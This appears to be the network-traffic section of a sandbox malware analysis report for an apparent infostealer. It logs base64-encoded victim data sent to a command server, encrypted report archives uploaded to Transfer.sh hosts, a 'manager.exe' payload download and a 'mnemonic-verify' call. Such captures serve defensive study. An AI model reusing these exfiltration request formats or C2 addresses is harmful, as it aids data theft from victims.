                                                                                                                                                                                                Sep 27, 2024 23:28:24.605009079 CEST808049743185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:24.605703115 CEST808049746185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:24.605778933 CEST497468080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:24.605931044 CEST497468080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:24.611044884 CEST808049746185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:32.943758011 CEST444449744193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:32.946409941 CEST497444444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:28:42.942378998 CEST497474444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:28:42.948055029 CEST444449747193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:42.948199987 CEST497474444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:28:46.010441065 CEST808049746185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:46.010524035 CEST497468080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:46.010715008 CEST497468080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:28:46.017095089 CEST808049746185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:04.349087954 CEST444449747193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:04.349162102 CEST497474444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:29:14.363740921 CEST497494444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:29:14.368688107 CEST444449749193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:14.368756056 CEST497494444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:29:23.114434958 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:29:23.119504929 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:23.310367107 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:23.334816933 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:29:23.350466967 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:28.122944117 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:29:28.129625082 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:28.319207907 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:28.424299955 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:29:28.733001947 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:29:28.738292933 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:35.744723082 CEST444449749193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:35.744843960 CEST497494444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:29:45.800750971 CEST497504444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:29:45.805838108 CEST444449750193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:29:45.808540106 CEST497504444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:30:07.180864096 CEST444449750193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:30:07.180938959 CEST497504444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:30:17.174870014 CEST497524444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:30:17.179833889 CEST444449752193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:30:17.179929018 CEST497524444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:30:38.538777113 CEST444449752193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:30:38.540613890 CEST497524444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:30:48.534928083 CEST497534444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:30:48.540091038 CEST444449753193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:30:48.540193081 CEST497534444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:31:09.966017008 CEST444449753193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:31:09.966083050 CEST497534444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:31:20.658968925 CEST497554444192.168.2.5193.149.187.135
                                                                                                                                                                                                Sep 27, 2024 23:31:20.669645071 CEST444449755193.149.187.135192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:31:20.669707060 CEST497554444192.168.2.5193.149.187.135
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Sep 27, 2024 23:27:13.284852028 CEST  61471        53         192.168.2.5  1.1.1.1
Sep 27, 2024 23:27:13.293793917 CEST  53           61471      1.1.1.1      192.168.2.5
Sep 27, 2024 23:27:14.412930012 CEST  55817        53         192.168.2.5  1.1.1.1
Sep 27, 2024 23:27:14.436815023 CEST  53           55817      1.1.1.1      192.168.2.5
Sep 27, 2024 23:27:16.568922997 CEST  51526        53         192.168.2.5  1.1.1.1
Sep 27, 2024 23:27:16.575623035 CEST  53           51526      1.1.1.1      192.168.2.5

Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class        DNS over HTTPS
Sep 27, 2024 23:27:13.284852028 CEST  192.168.2.5  1.1.1.1  0x76ae    Standard query (0)  ip-api.com        A (IP address)  IN (0x0001)  false
Sep 27, 2024 23:27:14.412930012 CEST  192.168.2.5  1.1.1.1  0x502f    Standard query (0)  serveo.net        A (IP address)  IN (0x0001)  false
Sep 27, 2024 23:27:16.568922997 CEST  192.168.2.5  1.1.1.1  0xa34e    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)  false

Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address          Type            Class        DNS over HTTPS
Sep 27, 2024 23:27:13.293793917 CEST  1.1.1.1    192.168.2.5  0x76ae    No error (0)  ip-api.com               208.95.112.1     A (IP address)  IN (0x0001)  false
Sep 27, 2024 23:27:14.436815023 CEST  1.1.1.1    192.168.2.5  0x502f    No error (0)  serveo.net               138.68.79.95     A (IP address)  IN (0x0001)  false
Sep 27, 2024 23:27:16.575623035 CEST  1.1.1.1    192.168.2.5  0xa34e    No error (0)  api.telegram.org         149.154.167.220  A (IP address)  IN (0x0001)  false

• api.telegram.org
• ip-api.com
• 185.253.7.60:8080
• 185.80.128.17
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49706        208.95.112.1    80                1964  C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 23:27:13.307378054 CEST  85                 OUT        GET /line?fields=query,country HTTP/1.1
                                                                    Host: ip-api.com
                                                                    Connection: Keep-Alive
Sep 27, 2024 23:27:13.791929960 CEST  196                IN         HTTP/1.1 200 OK
                                                                    Date: Fri, 27 Sep 2024 21:27:13 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Content-Length: 26
                                                                    Access-Control-Allow-Origin: *
                                                                    X-Ttl: 60
                                                                    X-Rl: 44
                                                                    Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                    Data Ascii: United States8.46.123.33


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49708        185.253.7.60    8080              1964  C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 23:27:14.504254103 CEST  251                OUT        POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1
                                                                    Host: 185.253.7.60:8080
                                                                    Content-Length: 135595
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.5  49709        208.95.112.1    80                5500  C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 23:27:14.926947117 CEST  85                 OUT        GET /line?fields=query,country HTTP/1.1
                                                                    Host: ip-api.com
                                                                    Connection: Keep-Alive
Sep 27, 2024 23:27:15.409276962 CEST  196                IN         HTTP/1.1 200 OK
                                                                    Date: Fri, 27 Sep 2024 21:27:15 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Content-Length: 26
                                                                    Access-Control-Allow-Origin: *
                                                                    X-Ttl: 58
                                                                    X-Rl: 43
                                                                    Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                    Data Ascii: United States8.46.123.33


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.5  49711        185.253.7.60    8080              5500  C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 23:27:15.897093058 CEST  251                OUT        POST //sendData?pk=MDM2MDQ3RTJFN0NDMTE4MjQzNkMzMUU0NEE4Nzg4QUU=&ta=TVNXSU5ET1c=&un=YWxmb25z&pc=MDUxODI5&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MQ== HTTP/1.1
                                                                    Host: 185.253.7.60:8080
                                                                    Content-Length: 140694
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.5  49729        167.99.138.249  8080              1964  C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp                             Bytes transferred  Direction  Data
Sep 27, 2024 23:27:36.837954998 CEST  147                OUT        PUT /9IYTn_user%40051829_report.wsr HTTP/1.1
                                                                    Host: 167.99.138.249:8080
                                                                    Content-Length: 135595
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


Session ID: 5   Source: 192.168.2.5:49735   Destination: 167.99.138.249:8080   PID: 5500   Process: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp / bytes transferred / direction / data:

Sep 27, 2024 23:27:42.170727015 CEST   147 bytes   OUT
    PUT /K7IvH_user%40051829_report.wsr HTTP/1.1
    Host: 167.99.138.249:8080
    Content-Length: 140694
    Expect: 100-continue
    Connection: Keep-Alive


Session ID: 6   Source: 192.168.2.5:49737   Destination: 206.189.109.146:80   PID: 1964   Process: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp / bytes transferred / direction / data:

Sep 27, 2024 23:27:58.216078997 CEST   143 bytes   OUT
    PUT /9IYTn_user%40051829_report.wsr HTTP/1.1
    Host: 206.189.109.146
    Content-Length: 135595
    Expect: 100-continue
    Connection: Keep-Alive
Sep 27, 2024 23:27:58.565079927 CEST   12360 bytes   OUT
    Data Raw: 57 53 52 24 1c 79 61 c6 46 bc d2 4e f5 e5 76 24 fe 33 be 62 71 d0 c8 da c1 1a 03 58 d4 dd c6 9d 3e b6 a0 3e af fd d4 97 e3 d7 9b 53 31 15 34 6c 34 16 50 6e 1b e8 51 cc f9 ce 6e 8f 3c 04 26 38 47 6c e0 47 d1 19 94 3b 75 d8 c2 ec e0 f6 eb 72 45 1d
    Data Ascii: WSR$yaFNv$3bqX>>S14l4PnQn<&8GlG;urEPznzqAU9U?81+lZznP%|y}S40:NMhO{:i=*m3]\uhUnYY6v[1)'yq
Sep 27, 2024 23:27:58.570271969 CEST   2472 bytes   OUT
    Data Raw: a2 a1 fe 2e 3f e0 b2 c4 15 06 d2 8b 5e d1 d1 22 d2 c8 ac a2 c9 e0 f9 f7 92 97 aa db a9 44 2e 70 66 94 db 44 d0 84 59 a2 69 6b 70 40 cc 61 32 02 a8 09 51 f9 c8 00 56 ba 52 47 80 ab b9 46 14 2f 85 dd cb ef d6 be 3d 66 8e 1c 5f 57 57 ab bd 5c 73 4b
    Data Ascii: .?^"D.pfDYikp@a2QVRGF/=f_WW\sK6i0.,bw4GCZ]R4yoPi15B9} iO4U?ISxHI$~s6qK9~9S"<'bPp{77:h$DMaNX$"Y*
Sep 27, 2024 23:27:58.570318937 CEST   7416 bytes   OUT
    Data Raw: 33 72 74 09 b2 e9 04 81 98 8b 94 0d e5 dd df ca 9e 78 0a e3 b6 40 0c 5e 65 c2 d6 f9 08 2c fa 83 41 12 e2 d9 9c 52 46 a0 01 df eb 19 ac 06 10 1f fc a4 e3 bc 85 c2 00 77 91 ff bd 38 f2 e0 1c e1 67 d5 5e 72 f5 2e 2c 54 2a bd ad 42 d5 3c d3 ff 51 db
    Data Ascii: 3rtx@^e,ARFw8g^r.,T*B<Q%c[Xmh0#;`?n Cz>wg(jkO1A\C+!]e!$`?mqq\Q6Q_p]ROf^{}=TwoL*p71tyBmIL
Sep 27, 2024 23:27:58.570353031 CEST   2472 bytes   OUT
    Data Raw: 30 ce 79 f7 02 a6 14 55 ef 1c 7a c5 70 69 a4 e9 da 0b 0e 16 cc 6a 42 d1 8f 8f de 0f 08 85 1e 35 90 3d d4 fb 9c 36 0b ab 79 96 88 53 b2 1d c4 77 52 f6 86 75 44 4a 16 58 90 b4 fd a0 06 6f 67 52 de 67 6c 7b 61 fa 1b a0 52 da 64 e3 21 2c 45 03 22 91
    Data Ascii: 0yUzpijB5=6ySwRuDJXogRgl{aRd!,E"LTU9"^3%kn.`n+6kJ"SNz(tw#FP (Tb^NZwcI'Y2afk%:U`j\.M8:
Sep 27, 2024 23:27:58.570437908 CEST   4944 bytes   OUT
    Data Raw: f3 dc aa 8f c7 fb bc 05 9b ec ce 21 79 30 7d 35 56 c1 68 97 48 86 63 a5 f9 f6 f2 2d 8b 11 a3 45 20 7c cf 8e 28 15 a1 d2 c8 5c 88 d0 47 5f 89 c5 a7 cd 7f cb 0c e5 2f d1 ef 6d 5d ad 85 43 8e f7 9d cc 50 08 e3 d0 7d 92 76 1a f8 31 28 c7 3c 1d 4a ab
    Data Ascii: !y0}5VhHc-E |(\G_/m]CP}v1(<JszNEC,K~xh/T9}3l0U"hp}c[+Q%tS)E TUv1k$$9>X+B MgL`*y]&(GHeP)?%}{n..a
Sep 27, 2024 23:27:58.570457935 CEST   2472 bytes   OUT
    Data Raw: e3 99 98 a4 e3 f8 33 7f a8 fd c5 ad ad 0c 38 d4 d7 dd 58 5d fa c7 2b 56 79 d8 3f 40 e9 83 9c a9 45 d8 2f 8e 2e 63 f5 aa 18 1c 16 42 1c 26 4c e2 7b 62 db 2c 8b 28 e2 9f 31 18 e6 1c c0 29 c0 7a 4e ed a6 26 61 2c 77 84 83 89 de 51 dc ef 9d f1 3d c4
    Data Ascii: 38X]+Vy?@E/.cB&L{b,(1)zN&a,wQ=1Q\+0m7PIEbrPGN7>;qEQz|2U[myz_hA&e!*R`b0cHFgum1\1G&t^
Sep 27, 2024 23:27:58.570485115 CEST   2472 bytes   OUT
    Data Raw: d7 f7 45 6e 47 fa 6f 7f 00 c6 80 65 0c 8b 90 c6 28 29 08 4c 2b 07 ef b3 fe e5 ec 6d a5 c9 14 4c 8e 4b 22 a7 bf 20 5a 59 a6 a8 03 a9 c9 2a 30 38 6b af 33 66 80 46 80 12 7b f3 b9 62 3c d0 46 cf 5f b9 84 a6 35 73 b2 a9 dc 47 48 34 c4 43 88 79 56 5b
    Data Ascii: EnGoe()L+mLK" ZY*08k3fF{b<F_5sGH4CyV[vS-AQ(K.OOH.TDLkjq\N0]r\vW)"BwR8^h;('S%5EChpq{ANKVVUz$""4T
Sep 27, 2024 23:27:58.571568966 CEST   2472 bytes   OUT
    Data Raw: 36 a9 14 91 0a 0b 98 34 56 f7 ac 46 bd 8f e5 ef f3 54 ac 46 2f 5e a1 35 10 2f a2 11 92 8a 7f 56 45 83 6d 8a 5d 36 d9 b0 6d f7 0c f5 81 81 e3 f0 ad af 17 3e e2 24 2e a2 ee 9f 57 06 02 8e 49 3f cd 4c ee 7e 20 d0 5a 83 9f fe 84 1c f7 1a cd 19 1f 6d
    Data Ascii: 64VFTF/^5/VEm]6m>$.WI?L~ ZmAW~V9(zP`08b4AGXt6#&f~X*3,(,ldP"a^32fB42Y'C{:e`[;LM<V PwopW--((4k
Sep 27, 2024 23:27:58.575158119 CEST   2472 bytes   OUT
    Data Raw: 2c 55 99 ed b4 ad 53 da 91 47 e9 11 f0 85 28 07 f4 ad 96 1c 38 88 6d 18 f1 16 0f 2a dd bd 86 94 58 c8 b9 b0 4a 04 23 b2 93 03 4b c6 6a 31 0a 6e 79 3d b9 7f 0d 1c b0 83 15 7d 61 3d 4e 3c 8c 57 ff 09 8f cc 29 24 a5 85 7d 29 77 7b 2c 55 12 c2 09 e6
    Data Ascii: ,USG(8m*XJ#Kj1ny=}a=N<W)$})w{,UONQ:v_e9 5Xky?UV;|HHY(V{(5d7X'[Zcb J;ccHC6hVy,G\ED#drDB*
Sep 27, 2024 23:27:58.575314045 CEST   4944 bytes   OUT
    Data Raw: 5a f3 f8 f7 93 2b d8 df ad 77 74 d0 12 52 1b 53 af ea 11 a4 2e c0 b9 3e 3e 21 c2 2b 99 24 80 57 0a d6 70 80 45 40 d5 ca b5 94 b0 f7 46 b5 a1 98 c4 37 3c d0 fa 32 86 4e f9 b8 42 a3 c8 91 9d 2f 5f 9f 2c d4 28 d9 06 b2 84 5d cc b0 ef cb 30 4c 8f af
    Data Ascii: Z+wtRS.>>!+$WpE@F7<2NB/_,(]0LU#1t)|%[0\tdY4.J>tFH?8iGaZDd?G&I{2]b0v1Vb^af?CI
Sep 27, 2024 23:27:59.097068071 CEST   313 bytes   IN
    HTTP/1.1 400 Bad Request
    Content-Type: text/plain; charset=utf-8
    Server: Transfer.sh HTTP Server
    X-Content-Type-Options: nosniff
    X-Made-With: <3 by DutchCoders
    X-Served-By: Proudly served by DutchCoders
    Date: Fri, 27 Sep 2024 21:27:59 GMT
    Content-Length: 26
    Connection: close
    Data Raw: 52 65 73 74 72 69 63 74 65 64 20 66 69 6c 65 20 65 78 74 65 6e 73 69 6f 6e 0a
    Data Ascii: Restricted file extension


Session ID: 7   Source: 192.168.2.5:49738   Destination: 45.82.65.63:80   PID: 1964   Process: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp / bytes transferred / direction / data:

Sep 27, 2024 23:27:59.114850998 CEST   139 bytes   OUT
    PUT /9IYTn_user%40051829_report.wsr HTTP/1.1
    Host: 45.82.65.63
    Content-Length: 135595
    Expect: 100-continue
    Connection: Keep-Alive
Sep 27, 2024 23:27:59.471261978 CEST   12360 bytes   OUT
    Data Raw: 57 53 52 24 1c 79 61 c6 46 bc d2 4e f5 e5 76 24 fe 33 be 62 71 d0 c8 da c1 1a 03 58 d4 dd c6 9d 3e b6 a0 3e af fd d4 97 e3 d7 9b 53 31 15 34 6c 34 16 50 6e 1b e8 51 cc f9 ce 6e 8f 3c 04 26 38 47 6c e0 47 d1 19 94 3b 75 d8 c2 ec e0 f6 eb 72 45 1d
    Data Ascii: WSR$yaFNv$3bqX>>S14l4PnQn<&8GlG;urEPznzqAU9U?81+lZznP%|y}S40:NMhO{:i=*m3]\uhUnYY6v[1)'yq
Sep 27, 2024 23:27:59.476480007 CEST   4944 bytes   OUT
    Data Raw: a2 a1 fe 2e 3f e0 b2 c4 15 06 d2 8b 5e d1 d1 22 d2 c8 ac a2 c9 e0 f9 f7 92 97 aa db a9 44 2e 70 66 94 db 44 d0 84 59 a2 69 6b 70 40 cc 61 32 02 a8 09 51 f9 c8 00 56 ba 52 47 80 ab b9 46 14 2f 85 dd cb ef d6 be 3d 66 8e 1c 5f 57 57 ab bd 5c 73 4b
    Data Ascii: .?^"D.pfDYikp@a2QVRGF/=f_WW\sK6i0.,bw4GCZ]R4yoPi15B9} iO4U?ISxHI$~s6qK9~9S"<'bPp{77:h$DMaNX$"Y*
Sep 27, 2024 23:27:59.476531982 CEST   2472 bytes   OUT
    Data Raw: 40 1e 07 f5 c4 92 78 06 56 2d 8f 9a b2 e7 0d f3 bc 59 3c 5c 17 6a ea 64 07 14 4f 66 fc ce a0 cf d9 3a 53 d6 1b a5 d6 6f 69 7a a5 f9 93 13 08 b2 d1 9b a6 8b 96 98 d7 d1 69 53 2c 22 2d ba 81 05 38 35 00 6d 38 d8 2a 84 88 e4 46 d4 01 13 c5 9b 57 27
    Data Ascii: @xV-Y<\jdOf:SoiziS,"-85m8*FW'$r&wB]{k$^(7ALX\Rx=AkCs'*A;Pzxte)7wyR5 Qix6Tk5Plt]s
Sep 27, 2024 23:27:59.476612091 CEST   2472 bytes   OUT
    Data Raw: 6d bc 86 9d b9 03 4c 9e 1a e4 f6 83 d5 c1 b5 45 e3 a1 9f 15 3f f2 0c d7 1d 4b d4 28 9c 97 d6 e6 c0 25 f0 cd d8 c5 08 99 30 2a a5 13 c7 00 01 d5 09 a4 d8 ae f5 5d 59 8d 43 7d 54 c2 2a 5e 40 f6 b4 28 88 a9 2c 40 b2 e5 96 82 a9 05 97 76 29 4b a5 19
    Data Ascii: mLE?K(%0*]YC}T*^@(,@v)KgR=;2H{@@1uC"Hg?]4c3+`=N_^t,d3*sZlaaw_Q?.Wh~_r[E*gsA=\TED:E{9
Sep 27, 2024 23:27:59.476641893 CEST   4944 bytes   OUT
    Data Raw: 30 ce 79 f7 02 a6 14 55 ef 1c 7a c5 70 69 a4 e9 da 0b 0e 16 cc 6a 42 d1 8f 8f de 0f 08 85 1e 35 90 3d d4 fb 9c 36 0b ab 79 96 88 53 b2 1d c4 77 52 f6 86 75 44 4a 16 58 90 b4 fd a0 06 6f 67 52 de 67 6c 7b 61 fa 1b a0 52 da 64 e3 21 2c 45 03 22 91
    Data Ascii: 0yUzpijB5=6ySwRuDJXogRgl{aRd!,E"LTU9"^3%kn.`n+6kJ"SNz(tw#FP (Tb^NZwcI'Y2afk%:U`j\.M8:
Sep 27, 2024 23:27:59.476725101 CEST   4944 bytes   OUT
    Data Raw: b9 61 d5 99 a5 dc c0 8d 5d 9f 8d d2 b3 77 29 13 9d 93 b2 a2 50 04 a2 96 dd e5 f0 67 a9 95 02 ba 10 9f b0 e8 e9 5d c5 2d 19 29 c2 76 4d c7 a0 dc 4d 9f 30 0d cd e2 6a e4 c4 a1 69 68 26 a7 b2 44 cb 00 5a 66 13 df 7a 3e 7d 77 85 a1 cd 7a 39 b9 7b 12
    Data Ascii: a]w)Pg]-)vMM0jih&DZfz>}wz9{j_|x7mT|WD`-_ZgMx@@`iydUA-SNuU+r>Tu&|ym{QV)tuWE\'[CSIm!mu2-
Sep 27, 2024 23:27:59.476766109 CEST   2472 bytes   OUT
    Data Raw: d7 f7 45 6e 47 fa 6f 7f 00 c6 80 65 0c 8b 90 c6 28 29 08 4c 2b 07 ef b3 fe e5 ec 6d a5 c9 14 4c 8e 4b 22 a7 bf 20 5a 59 a6 a8 03 a9 c9 2a 30 38 6b af 33 66 80 46 80 12 7b f3 b9 62 3c d0 46 cf 5f b9 84 a6 35 73 b2 a9 dc 47 48 34 c4 43 88 79 56 5b
    Data Ascii: EnGoe()L+mLK" ZY*08k3fF{b<F_5sGH4CyV[vS-AQ(K.OOH.TDLkjq\N0]r\vW)"BwR8^h;('S%5EChpq{ANKVVUz$""4T
Sep 27, 2024 23:27:59.476815939 CEST   2472 bytes   OUT
    Data Raw: 36 a9 14 91 0a 0b 98 34 56 f7 ac 46 bd 8f e5 ef f3 54 ac 46 2f 5e a1 35 10 2f a2 11 92 8a 7f 56 45 83 6d 8a 5d 36 d9 b0 6d f7 0c f5 81 81 e3 f0 ad af 17 3e e2 24 2e a2 ee 9f 57 06 02 8e 49 3f cd 4c ee 7e 20 d0 5a 83 9f fe 84 1c f7 1a cd 19 1f 6d
    Data Ascii: 64VFTF/^5/VEm]6m>$.WI?L~ ZmAW~V9(zP`08b4AGXt6#&f~X*3,(,ldP"a^32fB42Y'C{:e`[;LM<V PwopW--((4k
Sep 27, 2024 23:27:59.481331110 CEST   2472 bytes   OUT
    Data Raw: 2c 55 99 ed b4 ad 53 da 91 47 e9 11 f0 85 28 07 f4 ad 96 1c 38 88 6d 18 f1 16 0f 2a dd bd 86 94 58 c8 b9 b0 4a 04 23 b2 93 03 4b c6 6a 31 0a 6e 79 3d b9 7f 0d 1c b0 83 15 7d 61 3d 4e 3c 8c 57 ff 09 8f cc 29 24 a5 85 7d 29 77 7b 2c 55 12 c2 09 e6
    Data Ascii: ,USG(8m*XJ#Kj1ny=}a=N<W)$})w{,UONQ:v_e9 5Xky?UV;|HHY(V{(5d7X'[Zcb J;ccHC6hVy,G\ED#drDB*
Sep 27, 2024 23:27:59.481400967 CEST   7416 bytes   OUT
    Data Raw: 5a f3 f8 f7 93 2b d8 df ad 77 74 d0 12 52 1b 53 af ea 11 a4 2e c0 b9 3e 3e 21 c2 2b 99 24 80 57 0a d6 70 80 45 40 d5 ca b5 94 b0 f7 46 b5 a1 98 c4 37 3c d0 fa 32 86 4e f9 b8 42 a3 c8 91 9d 2f 5f 9f 2c d4 28 d9 06 b2 84 5d cc b0 ef cb 30 4c 8f af
    Data Ascii: Z+wtRS.>>!+$WpE@F7<2NB/_,(]0LU#1t)|%[0\tdY4.J>tFH?8iGaZDd?G&I{2]b0v1Vb^af?CI
Sep 27, 2024 23:28:00.006097078 CEST   313 bytes   IN
    HTTP/1.1 400 Bad Request
    Content-Type: text/plain; charset=utf-8
    Server: Transfer.sh HTTP Server
    X-Content-Type-Options: nosniff
    X-Made-With: <3 by DutchCoders
    X-Served-By: Proudly served by DutchCoders
    Date: Fri, 27 Sep 2024 21:27:59 GMT
    Content-Length: 26
    Connection: close
    Data Raw: 52 65 73 74 72 69 63 74 65 64 20 66 69 6c 65 20 65 78 74 65 6e 73 69 6f 6e 0a
    Data Ascii: Restricted file extension


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                8192.168.2.549739188.120.242.7888171964C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Sep 27, 2024 23:28:00.012242079 CEST147OUTPUT /9IYTn_user%40051829_report.wsr HTTP/1.1
                                                                                                                                                                                                Host: 188.120.242.78:8817
                                                                                                                                                                                                Content-Length: 135595
                                                                                                                                                                                                Expect: 100-continue
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Sep 27, 2024 23:28:00.693816900 CEST25INHTTP/1.1 100 Continue
                                                                                                                                                                                                Sep 27, 2024 23:28:01.051019907 CEST384INHTTP/1.1 200 OK
                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                Server: Transfer.sh HTTP Server
                                                                                                                                                                                                X-Made-With: <3 by DutchCoders
                                                                                                                                                                                                X-Served-By: Proudly served by DutchCoders
                                                                                                                                                                                                X-Url-Delete: http://188.120.242.78:8817/JfGGV6ePde/9IYTn_user@051829_report.wsr/NVuxS9alFiH9FvhRGGHa
                                                                                                                                                                                                Date: Fri, 27 Sep 2024 21:28:00 GMT
                                                                                                                                                                                                Content-Length: 68
                                                                                                                                                                                                Data Raw: 68 74 74 70 3a 2f 2f 31 38 38 2e 31 32 30 2e 32 34 32 2e 37 38 3a 38 38 31 37 2f 4a 66 47 47 56 36 65 50 64 65 2f 39 49 59 54 6e 5f 61 6c 66 6f 6e 73 40 30 35 31 38 32 39 5f 72 65 70 6f 72 74 2e 77 73 72
    Data Ascii: http://188.120.242.78:8817/JfGGV6ePde/9IYTn_user@051829_report.wsr


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.5  49741        185.80.128.17   80                1964  C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp  Bytes transferred  Direction  Data
Sep 27, 2024 23:28:02.060817957 CEST  74 bytes  OUT
    GET /manager.exe HTTP/1.1
    Host: 185.80.128.17
    Connection: Keep-Alive
Sep 27, 2024 23:28:02.722192049 CEST  1236 bytes  IN
    HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 21:28:02 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Last-Modified: Sun, 22 Sep 2024 18:44:49 GMT
    ETag: "cc00-622b9aabbea40"
    Accept-Ranges: bytes
    Content-Length: 52224
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdos-program


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.5  49743        185.253.7.60    8080              1964  C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe

Timestamp  Bytes transferred  Direction  Data
Sep 27, 2024 23:28:03.244808912 CEST  143 bytes  OUT
    GET //mnemonic-verify/52F48616470571256761856660/036047E2E7CC1182436C31E44A8788AE HTTP/1.1
    Host: 185.253.7.60:8080
    Connection: Keep-Alive


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
